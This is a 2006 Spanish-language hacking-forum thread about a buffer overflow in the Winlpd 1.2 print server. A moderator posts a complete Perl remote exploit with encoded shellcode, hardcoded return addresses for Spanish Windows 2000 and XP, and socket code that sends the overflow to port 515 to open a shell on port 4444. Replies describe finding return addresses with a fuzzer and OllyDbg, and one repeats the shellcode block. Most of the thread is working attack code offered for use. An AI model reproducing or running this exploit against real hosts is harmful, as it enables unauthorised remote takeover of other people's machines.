elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  fallo del winlpd, exploit y demostracion con video
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: fallo del winlpd, exploit y demostracion con video  (Leído 24,915 veces)
DarthP

Desconectado Desconectado

Mensajes: 4


Ver Perfil
fallo del winlpd, exploit y demostracion con video
« en: 15 Julio 2006, 08:14 »



Aquí dejo el exploit del winlpd. Esto ya casi tiene un año. El 12 de agosto del 2005  escribí reportándo el bug a los que lo desarrollaron, me respondieron que querían ver de que se trataba. Envié un video y el exploit, pero nunca tuve una respuesta. Hoy volví a bajar el soft y realicé la misma prueba y todo sigue igual. Así que hice una nueva demostración.

http://www.empresalinux.com.ar
En línea

sirdarckcat
Aspirante a supervillano
Moderador Global
***
Desconectado Desconectado

Mensajes: 7.013


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: fallo del winlpd, exploit y demostracion con video
« Respuesta #1 en: 15 Julio 2006, 08:40 »

Hola
El link de tu web, esta en netfirms, y netfirms le agregó un banner a tu rar xD por lo que no se descarga bien.

dejo el codigo.
Código:
#!/usr/bin/perl

####################################################
#
# A proof of concept Remote Buffer Overflow Exploit
#
# App Vulnerable: Winlpd 1.2 Build 1076 - rabox.com
#
# Possibe some problems with WinXP if exploit doesn't
# work correctly, try another number in var 'loop'.
#
# Buffer size 524 bytes.
#
# Author: Pablo Isola - neuquencapital@hotmail.com
#
# Neuquen - Patagonia Argentina.
#
# To my friend 'Esteban T.' and all of my friends...
# you know who you are.
#
####################################################

use Getopt::Std;
use Socket;
my $SOCKET = "";

$loop = 51;  # 51 for Windows 2K and 100 to 120 for Windows XP
$host = $ARGV[0];
$port = 515;


if (!defined $host){

print "Error in Params.\n";
print "Usage: winlpd_exp.pl [host] \n";
print "Open remote shell on port 4444\n";
exit;
}


print "\nA Remote Buffer Overflow Exploit\n".
"Coded by Pablo Isola - neuquencapital\@hotmail.com\nNeuquen - Patagonia Argentina\n\n";


$sc  = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66";
$sc .= "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6";
$sc .= "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa";
$sc .= "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f";
$sc .= "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb";
$sc .= "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba";
$sc .= "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb";
$sc .= "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc";
$sc .= "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61";
$sc .= "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70";
$sc .= "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44";
$sc .= "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7";
$sc .= "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69";
$sc .= "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9";
$sc .= "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0";
$sc .= "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3";
$sc .= "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7";
$sc .= "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0";
$sc .= "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67";
$sc .= "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1";
$sc .= "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0";
$sc .= "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88";
$sc .= "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d";
$sc .= "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95";
$sc .= "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2";

#0x77817477 return address for Windows 2K Professional 5.0.2195 SP4 Spanish
#0x77A12553 return address for Windows XP Professional 5.1.2600 SP1 Spanish

$ret = "\x77\x74\x81\x77";  # return address
$nop = "\x90" x 16;         # nops for padding
$str = "\x41" x 524 .$ret.$nop.$sc;

$iaddr = inet_aton($host)           || die "Unknown host: $host\n";
$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";
$proto = getprotobyname('tcp')      || die "getprotobyname: $!\n";

for ($j=1;$j<$loop;$j++) {

socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!\n";
connect(SOCKET,$paddr) || die "Lost Conection: $! .........ay Carumba?\n";
send(SOCKET,$str, 0) || die "failure sent: $!\n";
print "\nSending string: ".$j;
# print "\nview:\n".$str."\n";
sleep(1);
close SOCKET;
sleep(1);
}

print "\n\nTry: telnet remote_ip 4444\n\n".
"To my friend 'Esteban T.' and to all of my friends...you know who you are.\n".
"Have a nice day :)\n\n";

Saludos!!
PD. Mandame el video por pirvado, y lo subo al foro ;)
En línea

track1

Desconectado Desconectado

Mensajes: 102


Ver Perfil
Re: fallo del winlpd, exploit y demostracion con video
« Respuesta #2 en: 15 Julio 2006, 19:47 »

Gracias por el exploit y el video, solo queria preguntar como supiste en el video cual pc estaba corriendo el soft? me refiero a que como supiste cual pc atacar?
En línea

NO HAY CAMINO HACIA LA PAZ,
LA PAZ ES EL CAMINO
DarthP

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: fallo del winlpd, exploit y demostracion con video
« Respuesta #3 en: 15 Julio 2006, 20:35 »

La demostracion la hice en mi lan, el exploit se lanzo desde un linux y la maquina victima era un win2k donde estaba ejecutando el winlpd y el programa de captura (CamStudio)
En línea

elcubano

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: fallo del winlpd, exploit y demostracion con video
« Respuesta #4 en: 15 Julio 2006, 23:43 »

¿cómo descubro el return address para win2k sp4 en inglés?
En línea

Preth00nker

Desconectado Desconectado

Mensajes: 43


Mov MyHeart, 4C6F7665h!!!


Ver Perfil
Re: fallo del winlpd, exploit y demostracion con video
« Respuesta #5 en: 16 Julio 2006, 00:21 »

¿cómo descubro el return address para win2k sp4 en inglés?
Lee el tutorial de Rojodos y de ahí bajate el findjmp..

el video está muy bien el codigo no lo he checado pero prometo calarlo hoy
salut's
En línea

mov [MyBrain], IA
DarthP

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: fallo del winlpd, exploit y demostracion con video
« Respuesta #6 en: 16 Julio 2006, 00:23 »

Yo use el ollydbg en win2k español y sp4. Para descubrir el fallo use un fuzzer, luego use el olydbg. fueron horas de pueba hasta encontrar la la direccion de retorno. tendrias q hacer lo mismo con tu win2k en ingles y el modulo del ollydgb de over flow (OllyUni by FX of Phenoelit – http://www.phenoelit.de)
En línea

sirdarckcat
Aspirante a supervillano
Moderador Global
***
Desconectado Desconectado

Mensajes: 7.013


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: fallo del winlpd, exploit y demostracion con video
« Respuesta #7 en: 16 Julio 2006, 02:40 »

Publicado en milw0rm.

http://www.milw0rm.com/exploits/2014

Saludos!!
En línea

Divson

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: fallo del winlpd, exploit y demostracion con video
« Respuesta #8 en: 19 Julio 2006, 03:09 »

Alguien me podria explicar que significa esto y por que lo ponen de esas manera si no me equivoco es hexadecimal no???. es para ocultar el código??.

Expliquen me pero como para principiante.
¿que es?
¿por que asi? uqe finalidad tiene.

Citar
$sc  = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66";
$sc .= "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6";
$sc .= "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa";
$sc .= "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f";
$sc .= "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb";
$sc .= "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba";
$sc .= "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb";
$sc .= "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc";
$sc .= "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61";
$sc .= "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70";
$sc .= "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44";
$sc .= "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7";
$sc .= "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69";
$sc .= "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9";
$sc .= "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0";
$sc .= "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3";
$sc .= "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7";
$sc .= "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0";
$sc .= "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67";
$sc .= "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1";
$sc .= "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0";
$sc .= "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88";
$sc .= "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d";
$sc .= "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95";
$sc .= "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2";


En línea

sirdarckcat
Aspirante a supervillano
Moderador Global
***
Desconectado Desconectado

Mensajes: 7.013


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: fallo del winlpd, exploit y demostracion con video
« Respuesta #9 en: 19 Julio 2006, 03:33 »

son OP codes (un programa binario en su equivalente en texto (algo asi.. no exactamente))
busca info sobre shellcodes

Saludos!!
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda con demostracion de malware.
Análisis y Diseño de Malware
Delt_hack 5 4,143 Último mensaje 18 Junio 2011, 01:43
por julian.97
Manipular ventanas y procesos video de demostracion
Programación C/C++
Kevin Korduner 0 481 Último mensaje 12 Octubre 2017, 20:23
por Kevin Korduner
Crashcast video mass-exploit
Bugs y Exploits
r32 0 424 Último mensaje 4 Enero 2019, 09:23
por r32
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines